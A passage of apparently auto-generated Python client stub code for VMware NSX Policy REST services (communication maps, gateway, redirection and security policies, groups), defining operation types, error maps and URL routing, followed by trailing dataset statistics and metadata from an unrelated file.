        # Every operation of this service declares the same five standard
        # vAPI errors; build each operation's error dictionary from one
        # helper instead of repeating the literal six times.
        def _standard_errors():
            error_names = (
                ('com.vmware.vapi.std.errors.service_unavailable', 'ServiceUnavailable'),
                ('com.vmware.vapi.std.errors.invalid_request', 'InvalidRequest'),
                ('com.vmware.vapi.std.errors.internal_server_error', 'InternalServerError'),
                ('com.vmware.vapi.std.errors.unauthorized', 'Unauthorized'),
                ('com.vmware.vapi.std.errors.not_found', 'NotFound'),
            )
            return dict(
                (error_id,
                 type.ReferenceType('com.vmware.vapi.std.errors_client', class_name))
                for error_id, class_name in error_names)

        # Fresh reference to the CommunicationMap model type (body/result).
        def _map_type():
            return type.ReferenceType(
                'com.vmware.nsx_policy.model_client', 'CommunicationMap')

        # Fresh copy of the identifying path parameters shared by most ops.
        def _id_params():
            return {
                'domain_id': type.StringType(),
                'communication_map_id': type.StringType(),
            }

        _ITEM_URL = '/policy/api/v1/infra/domains/{domain-id}/communication-maps/{communication-map-id}'
        _ITEM_PATH_VARS = {
            'domain_id': 'domain-id',
            'communication_map_id': 'communication-map-id',
        }

        # ---- delete ----------------------------------------------------
        delete_input_type = type.StructType('operation-input', _id_params())
        delete_error_dict = _standard_errors()
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template=_ITEM_URL,
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={},
            content_type='application/json')

        # ---- get -------------------------------------------------------
        get_input_type = type.StructType('operation-input', _id_params())
        get_error_dict = _standard_errors()
        get_input_value_validator_list = []
        get_output_validator_list = [HasFieldsOfValidator()]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template=_ITEM_URL,
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={},
            content_type='application/json')

        # ---- list ------------------------------------------------------
        list_fields = {'domain_id': type.StringType()}
        list_fields.update({
            'cursor': type.OptionalType(type.StringType()),
            'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_input_type = type.StructType('operation-input', list_fields)
        list_error_dict = _standard_errors()
        list_input_value_validator_list = []
        list_output_validator_list = [HasFieldsOfValidator()]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/policy/api/v1/infra/domains/{domain-id}/communication-maps',
            path_variables={
                'domain_id': 'domain-id',
            },
            # Query parameter wire names are identical to the binding names.
            query_parameters=dict((name, name) for name in (
                'cursor', 'include_mark_for_delete_objects', 'included_fields',
                'page_size', 'sort_ascending', 'sort_by')),
            content_type='application/json')

        # ---- patch -----------------------------------------------------
        patch_fields = _id_params()
        patch_fields['communication_map'] = _map_type()
        patch_input_type = type.StructType('operation-input', patch_fields)
        patch_error_dict = _standard_errors()
        patch_input_value_validator_list = [HasFieldsOfValidator()]
        patch_output_validator_list = []
        patch_rest_metadata = OperationRestMetadata(
            http_method='PATCH',
            url_template=_ITEM_URL,
            request_body_parameter='communication_map',
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={},
            content_type='application/json')

        # ---- revise ----------------------------------------------------
        revise_fields = _id_params()
        revise_fields['communication_map'] = _map_type()
        revise_fields['anchor_path'] = type.OptionalType(type.StringType())
        revise_fields['operation'] = type.OptionalType(type.StringType())
        revise_input_type = type.StructType('operation-input', revise_fields)
        revise_error_dict = _standard_errors()
        revise_input_value_validator_list = [HasFieldsOfValidator()]
        revise_output_validator_list = [HasFieldsOfValidator()]
        revise_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template=_ITEM_URL + '?action=revise',
            request_body_parameter='communication_map',
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={
                'anchor_path': 'anchor_path',
                'operation': 'operation',
            },
            content_type='application/json')

        # ---- update ----------------------------------------------------
        update_fields = _id_params()
        update_fields['communication_map'] = _map_type()
        update_input_type = type.StructType('operation-input', update_fields)
        update_error_dict = _standard_errors()
        update_input_value_validator_list = [HasFieldsOfValidator()]
        update_output_validator_list = [HasFieldsOfValidator()]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template=_ITEM_URL,
            request_body_parameter='communication_map',
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={},
            content_type='application/json')

        # Assemble the per-operation descriptors; task_type is always NONE.
        def _operation(input_type, output_type, errors, in_validators, out_validators):
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': errors,
                'input_value_validator_list': in_validators,
                'output_validator_list': out_validators,
                'task_type': TaskType.NONE,
            }

        operations = {
            'delete': _operation(
                delete_input_type, type.VoidType(), delete_error_dict,
                delete_input_value_validator_list, delete_output_validator_list),
            'get': _operation(
                get_input_type, _map_type(), get_error_dict,
                get_input_value_validator_list, get_output_validator_list),
            'list': _operation(
                list_input_type,
                type.ReferenceType('com.vmware.nsx_policy.model_client',
                                   'CommunicationMapListResult'),
                list_error_dict,
                list_input_value_validator_list, list_output_validator_list),
            'patch': _operation(
                patch_input_type, type.VoidType(), patch_error_dict,
                patch_input_value_validator_list, patch_output_validator_list),
            'revise': _operation(
                revise_input_type, _map_type(), revise_error_dict,
                revise_input_value_validator_list, revise_output_validator_list),
            'update': _operation(
                update_input_type, _map_type(), update_error_dict,
                update_input_value_validator_list, update_output_validator_list),
        }
        rest_metadata = {
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'patch': patch_rest_metadata,
            'revise': revise_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx_policy.infra.domains.communication_maps',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _GatewayPoliciesStub(ApiInterfaceStub):
    """REST stub metadata for the gateway-policies service."""

    def __init__(self, config):
        # Every operation of this service declares the same five standard
        # vAPI errors; build each operation's error dictionary from one
        # helper instead of repeating the literal six times.
        def _standard_errors():
            error_names = (
                ('com.vmware.vapi.std.errors.service_unavailable', 'ServiceUnavailable'),
                ('com.vmware.vapi.std.errors.invalid_request', 'InvalidRequest'),
                ('com.vmware.vapi.std.errors.internal_server_error', 'InternalServerError'),
                ('com.vmware.vapi.std.errors.unauthorized', 'Unauthorized'),
                ('com.vmware.vapi.std.errors.not_found', 'NotFound'),
            )
            return dict(
                (error_id,
                 type.ReferenceType('com.vmware.vapi.std.errors_client', class_name))
                for error_id, class_name in error_names)

        # Fresh reference to the GatewayPolicy model type (body/result).
        def _policy_type():
            return type.ReferenceType(
                'com.vmware.nsx_policy.model_client', 'GatewayPolicy')

        # Fresh copy of the identifying path parameters shared by most ops.
        def _id_params():
            return {
                'domain_id': type.StringType(),
                'gateway_policy_id': type.StringType(),
            }

        _ITEM_URL = '/policy/api/v1/infra/domains/{domain-id}/gateway-policies/{gateway-policy-id}'
        _ITEM_PATH_VARS = {
            'domain_id': 'domain-id',
            'gateway_policy_id': 'gateway-policy-id',
        }

        # ---- delete ----------------------------------------------------
        delete_input_type = type.StructType('operation-input', _id_params())
        delete_error_dict = _standard_errors()
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template=_ITEM_URL,
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={},
            content_type='application/json')

        # ---- get -------------------------------------------------------
        get_input_type = type.StructType('operation-input', _id_params())
        get_error_dict = _standard_errors()
        get_input_value_validator_list = []
        get_output_validator_list = [HasFieldsOfValidator()]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template=_ITEM_URL,
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={},
            content_type='application/json')

        # ---- list ------------------------------------------------------
        list_fields = {'domain_id': type.StringType()}
        list_fields.update({
            'cursor': type.OptionalType(type.StringType()),
            'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_input_type = type.StructType('operation-input', list_fields)
        list_error_dict = _standard_errors()
        list_input_value_validator_list = []
        list_output_validator_list = [HasFieldsOfValidator()]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/policy/api/v1/infra/domains/{domain-id}/gateway-policies',
            path_variables={
                'domain_id': 'domain-id',
            },
            # Query parameter wire names are identical to the binding names.
            query_parameters=dict((name, name) for name in (
                'cursor', 'include_mark_for_delete_objects', 'included_fields',
                'page_size', 'sort_ascending', 'sort_by')),
            content_type='application/json')

        # ---- patch -----------------------------------------------------
        patch_fields = _id_params()
        patch_fields['gateway_policy'] = _policy_type()
        patch_input_type = type.StructType('operation-input', patch_fields)
        patch_error_dict = _standard_errors()
        patch_input_value_validator_list = [HasFieldsOfValidator()]
        patch_output_validator_list = []
        patch_rest_metadata = OperationRestMetadata(
            http_method='PATCH',
            url_template=_ITEM_URL,
            request_body_parameter='gateway_policy',
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={},
            content_type='application/json')

        # ---- revise ----------------------------------------------------
        revise_fields = _id_params()
        revise_fields['gateway_policy'] = _policy_type()
        revise_fields['anchor_path'] = type.OptionalType(type.StringType())
        revise_fields['operation'] = type.OptionalType(type.StringType())
        revise_input_type = type.StructType('operation-input', revise_fields)
        revise_error_dict = _standard_errors()
        revise_input_value_validator_list = [HasFieldsOfValidator()]
        revise_output_validator_list = [HasFieldsOfValidator()]
        revise_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template=_ITEM_URL + '?action=revise',
            request_body_parameter='gateway_policy',
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={
                'anchor_path': 'anchor_path',
                'operation': 'operation',
            },
            content_type='application/json')

        # ---- update ----------------------------------------------------
        update_fields = _id_params()
        update_fields['gateway_policy'] = _policy_type()
        update_input_type = type.StructType('operation-input', update_fields)
        update_error_dict = _standard_errors()
        update_input_value_validator_list = [HasFieldsOfValidator()]
        update_output_validator_list = [HasFieldsOfValidator()]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template=_ITEM_URL,
            request_body_parameter='gateway_policy',
            path_variables=dict(_ITEM_PATH_VARS),
            query_parameters={},
            content_type='application/json')

        # Assemble the per-operation descriptors; task_type is always NONE.
        def _operation(input_type, output_type, errors, in_validators, out_validators):
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': errors,
                'input_value_validator_list': in_validators,
                'output_validator_list': out_validators,
                'task_type': TaskType.NONE,
            }

        operations = {
            'delete': _operation(
                delete_input_type, type.VoidType(), delete_error_dict,
                delete_input_value_validator_list, delete_output_validator_list),
            'get': _operation(
                get_input_type, _policy_type(), get_error_dict,
                get_input_value_validator_list, get_output_validator_list),
            'list': _operation(
                list_input_type,
                type.ReferenceType('com.vmware.nsx_policy.model_client',
                                   'GatewayPolicyListResult'),
                list_error_dict,
                list_input_value_validator_list, list_output_validator_list),
            'patch': _operation(
                patch_input_type, type.VoidType(), patch_error_dict,
                patch_input_value_validator_list, patch_output_validator_list),
            'revise': _operation(
                revise_input_type, _policy_type(), revise_error_dict,
                revise_input_value_validator_list, revise_output_validator_list),
            'update': _operation(
                update_input_type, _policy_type(), update_error_dict,
                update_input_value_validator_list, update_output_validator_list),
        }
        rest_metadata = {
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'patch': patch_rest_metadata,
            'revise': revise_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx_policy.infra.domains.gateway_policies',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _GroupsStub(ApiInterfaceStub):
    """REST stub for the ``infra.domains.groups`` service.

    Assembles the operation metadata (input/output types, error maps,
    validators, and REST routing) handed to :class:`ApiInterfaceStub`.
    """
    def __init__(self, config):
        # Every operation of this service declares the same five standard
        # VAPI errors, so build the map per-operation with a helper instead
        # of repeating the literal five times.
        def std_errors():
            catalog = (
                ('service_unavailable', 'ServiceUnavailable'),
                ('invalid_request', 'InvalidRequest'),
                ('internal_server_error', 'InternalServerError'),
                ('unauthorized', 'Unauthorized'),
                ('not_found', 'NotFound'),
            )
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls_name)
                for suffix, cls_name in catalog
            }

        def model_ref(type_name):
            # Shortcut for references into the NSX policy data model.
            return type.ReferenceType('com.vmware.nsx_policy.model_client', type_name)

        # Shared REST routing pieces.
        item_url = '/policy/api/v1/infra/domains/{domain-id}/groups/{group-id}'
        collection_url = '/policy/api/v1/infra/domains/{domain-id}/groups'

        def item_path_vars():
            return {
                'domain_id': 'domain-id',
                'group_id': 'group-id',
            }

        # ---- delete -----------------------------------------------------
        delete_input_type = type.StructType('operation-input', {
            'domain_id': type.StringType(),
            'group_id': type.StringType(),
            'fail_if_subtree_exists': type.OptionalType(type.BooleanType()),
            'force': type.OptionalType(type.BooleanType()),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template=item_url,
            path_variables=item_path_vars(),
            query_parameters={
                'fail_if_subtree_exists': 'fail_if_subtree_exists',
                'force': 'force',
            },
            content_type='application/json'
        )

        # ---- get --------------------------------------------------------
        get_input_type = type.StructType('operation-input', {
            'domain_id': type.StringType(),
            'group_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template=item_url,
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )

        # ---- list -------------------------------------------------------
        list_input_type = type.StructType('operation-input', {
            'domain_id': type.StringType(),
            'cursor': type.OptionalType(type.StringType()),
            'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template=collection_url,
            path_variables={
                'domain_id': 'domain-id',
            },
            query_parameters={
                'cursor': 'cursor',
                'include_mark_for_delete_objects': 'include_mark_for_delete_objects',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )

        # ---- patch / update ---------------------------------------------
        # PATCH and PUT take the identical payload shape.
        def write_input_type():
            return type.StructType('operation-input', {
                'domain_id': type.StringType(),
                'group_id': type.StringType(),
                'group': model_ref('Group'),
            })

        patch_rest_metadata = OperationRestMetadata(
            http_method='PATCH',
            url_template=item_url,
            request_body_parameter='group',
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template=item_url,
            request_body_parameter='group',
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )

        operations = {
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': model_ref('Group'),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': model_ref('GroupListResult'),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'patch': {
                'input_type': write_input_type(),
                'output_type': type.VoidType(),
                'errors': std_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': write_input_type(),
                'output_type': model_ref('Group'),
                'errors': std_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'patch': patch_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx_policy.infra.domains.groups',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _RedirectionPoliciesStub(ApiInterfaceStub):
    """REST stub for the ``infra.domains.redirection_policies`` service.

    Assembles the operation metadata (input/output types, error maps,
    validators, and REST routing) handed to :class:`ApiInterfaceStub`.
    """
    def __init__(self, config):
        # Every operation of this service declares the same five standard
        # VAPI errors, so build the map per-operation with a helper instead
        # of repeating the literal six times.
        def std_errors():
            catalog = (
                ('service_unavailable', 'ServiceUnavailable'),
                ('invalid_request', 'InvalidRequest'),
                ('internal_server_error', 'InternalServerError'),
                ('unauthorized', 'Unauthorized'),
                ('not_found', 'NotFound'),
            )
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls_name)
                for suffix, cls_name in catalog
            }

        def model_ref(type_name):
            # Shortcut for references into the NSX policy data model.
            return type.ReferenceType('com.vmware.nsx_policy.model_client', type_name)

        # Shared REST routing pieces.  Note `list` (no domain segment) and
        # `list_0` (domain-scoped) use two different collection URLs.
        item_url = '/policy/api/v1/infra/domains/{domain-id}/redirection-policies/{redirection-policy-id}'

        def item_path_vars():
            return {
                'domain_id': 'domain-id',
                'redirection_policy_id': 'redirection-policy-id',
            }

        def paging_params():
            # Standard NSX list-operation paging/sorting query parameters.
            return {
                'cursor': 'cursor',
                'include_mark_for_delete_objects': 'include_mark_for_delete_objects',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            }

        def paging_fields():
            return {
                'cursor': type.OptionalType(type.StringType()),
                'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
                'included_fields': type.OptionalType(type.StringType()),
                'page_size': type.OptionalType(type.IntegerType()),
                'sort_ascending': type.OptionalType(type.BooleanType()),
                'sort_by': type.OptionalType(type.StringType()),
            }

        # ---- delete -----------------------------------------------------
        delete_input_type = type.StructType('operation-input', {
            'domain_id': type.StringType(),
            'redirection_policy_id': type.StringType(),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template=item_url,
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )

        # ---- get --------------------------------------------------------
        get_input_type = type.StructType('operation-input', {
            'domain_id': type.StringType(),
            'redirection_policy_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template=item_url,
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )

        # ---- list (not domain-scoped) -----------------------------------
        list_input_type = type.StructType('operation-input', paging_fields())
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/policy/api/v1/infra/domains/redirection-policies',
            path_variables={
            },
            query_parameters=paging_params(),
            content_type='application/json'
        )

        # ---- list_0 (domain-scoped) -------------------------------------
        list_0_fields = {'domain_id': type.StringType()}
        list_0_fields.update(paging_fields())
        list_0_input_type = type.StructType('operation-input', list_0_fields)
        list_0_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/policy/api/v1/infra/domains/{domain-id}/redirection-policies',
            path_variables={
                'domain_id': 'domain-id',
            },
            query_parameters=paging_params(),
            content_type='application/json'
        )

        # ---- patch / update ---------------------------------------------
        # PATCH and PUT take the identical payload shape.
        def write_input_type():
            return type.StructType('operation-input', {
                'domain_id': type.StringType(),
                'redirection_policy_id': type.StringType(),
                'redirection_policy': model_ref('RedirectionPolicy'),
            })

        patch_rest_metadata = OperationRestMetadata(
            http_method='PATCH',
            url_template=item_url,
            request_body_parameter='redirection_policy',
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template=item_url,
            request_body_parameter='redirection_policy',
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )

        operations = {
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': model_ref('RedirectionPolicy'),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': model_ref('RedirectionPolicyListResult'),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'list_0': {
                'input_type': list_0_input_type,
                'output_type': model_ref('RedirectionPolicyListResult'),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'patch': {
                'input_type': write_input_type(),
                'output_type': type.VoidType(),
                'errors': std_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': write_input_type(),
                'output_type': model_ref('RedirectionPolicy'),
                'errors': std_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'list_0': list_0_rest_metadata,
            'patch': patch_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx_policy.infra.domains.redirection_policies',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _SecurityPoliciesStub(ApiInterfaceStub):
    """REST stub for the ``infra.domains.security_policies`` service.

    Assembles the operation metadata (input/output types, error maps,
    validators, and REST routing) handed to :class:`ApiInterfaceStub`.
    """
    def __init__(self, config):
        # Every operation of this service declares the same five standard
        # VAPI errors, so build the map per-operation with a helper instead
        # of repeating the literal six times.
        def std_errors():
            catalog = (
                ('service_unavailable', 'ServiceUnavailable'),
                ('invalid_request', 'InvalidRequest'),
                ('internal_server_error', 'InternalServerError'),
                ('unauthorized', 'Unauthorized'),
                ('not_found', 'NotFound'),
            )
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls_name)
                for suffix, cls_name in catalog
            }

        def model_ref(type_name):
            # Shortcut for references into the NSX policy data model.
            return type.ReferenceType('com.vmware.nsx_policy.model_client', type_name)

        # Shared REST routing pieces.
        item_url = '/policy/api/v1/infra/domains/{domain-id}/security-policies/{security-policy-id}'
        collection_url = '/policy/api/v1/infra/domains/{domain-id}/security-policies'

        def item_path_vars():
            return {
                'domain_id': 'domain-id',
                'security_policy_id': 'security-policy-id',
            }

        def id_fields():
            return {
                'domain_id': type.StringType(),
                'security_policy_id': type.StringType(),
            }

        # ---- delete -----------------------------------------------------
        delete_input_type = type.StructType('operation-input', id_fields())
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template=item_url,
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )

        # ---- get --------------------------------------------------------
        get_input_type = type.StructType('operation-input', id_fields())
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template=item_url,
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )

        # ---- list -------------------------------------------------------
        list_input_type = type.StructType('operation-input', {
            'domain_id': type.StringType(),
            'cursor': type.OptionalType(type.StringType()),
            'include_mark_for_delete_objects': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template=collection_url,
            path_variables={
                'domain_id': 'domain-id',
            },
            query_parameters={
                'cursor': 'cursor',
                'include_mark_for_delete_objects': 'include_mark_for_delete_objects',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )

        # ---- patch / update ---------------------------------------------
        # PATCH and PUT take the identical payload shape.
        def write_input_type():
            payload = id_fields()
            payload['security_policy'] = model_ref('SecurityPolicy')
            return type.StructType('operation-input', payload)

        patch_rest_metadata = OperationRestMetadata(
            http_method='PATCH',
            url_template=item_url,
            request_body_parameter='security_policy',
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template=item_url,
            request_body_parameter='security_policy',
            path_variables=item_path_vars(),
            query_parameters={
            },
            content_type='application/json'
        )

        # ---- revise -----------------------------------------------------
        # Same payload as update plus optional positioning parameters.
        revise_fields = id_fields()
        revise_fields.update({
            'security_policy': model_ref('SecurityPolicy'),
            'anchor_path': type.OptionalType(type.StringType()),
            'operation': type.OptionalType(type.StringType()),
        })
        revise_input_type = type.StructType('operation-input', revise_fields)
        revise_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template=item_url + '?action=revise',
            request_body_parameter='security_policy',
            path_variables=item_path_vars(),
            query_parameters={
                'anchor_path': 'anchor_path',
                'operation': 'operation',
            },
            content_type='application/json'
        )

        operations = {
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': model_ref('SecurityPolicy'),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': model_ref('SecurityPolicyListResult'),
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'patch': {
                'input_type': write_input_type(),
                'output_type': type.VoidType(),
                'errors': std_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'revise': {
                'input_type': revise_input_type,
                'output_type': model_ref('SecurityPolicy'),
                'errors': std_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': write_input_type(),
                'output_type': model_ref('SecurityPolicy'),
                'errors': std_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'patch': patch_rest_metadata,
            'revise': revise_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx_policy.infra.domains.security_policies',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class StubFactory(StubFactoryBase):
    # Attribute map consumed by StubFactoryBase.  Class-valued entries are
    # the service wrappers defined earlier in this module; string-valued
    # entries are dotted paths to the StubFactory of a child package
    # (presumably resolved lazily by StubFactoryBase — confirm against its
    # implementation).
    _attrs = {
        'CommunicationMaps': CommunicationMaps,
        'GatewayPolicies': GatewayPolicies,
        'Groups': Groups,
        'RedirectionPolicies': RedirectionPolicies,
        'SecurityPolicies': SecurityPolicies,
        'communication_maps': 'com.vmware.nsx_policy.infra.domains.communication_maps_client.StubFactory',
        'gateway_policies': 'com.vmware.nsx_policy.infra.domains.gateway_policies_client.StubFactory',
        'groups': 'com.vmware.nsx_policy.infra.domains.groups_client.StubFactory',
        'redirection_policies': 'com.vmware.nsx_policy.infra.domains.redirection_policies_client.StubFactory',
        'security_policies': 'com.vmware.nsx_policy.infra.domains.security_policies_client.StubFactory',
    }
| 44.917919
| 124
| 0.592025
| 12,094
| 122,581
| 5.750455
| 0.022987
| 0.069105
| 0.081313
| 0.100078
| 0.967762
| 0.965102
| 0.958761
| 0.95288
| 0.944353
| 0.940716
| 0
| 0.000851
| 0.300095
| 122,581
| 2,728
| 125
| 44.934384
| 0.809756
| 0.258401
| 0
| 0.813914
| 1
| 0.013009
| 0.324104
| 0.210648
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022059
| false
| 0
| 0.006787
| 0
| 0.061652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0fcb8e28808b35af9dd70b9dc4cc19dcbbc40172
| 145
|
py
|
Python
|
loldib/getratings/models/NA/na_taric/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_taric/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_taric/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
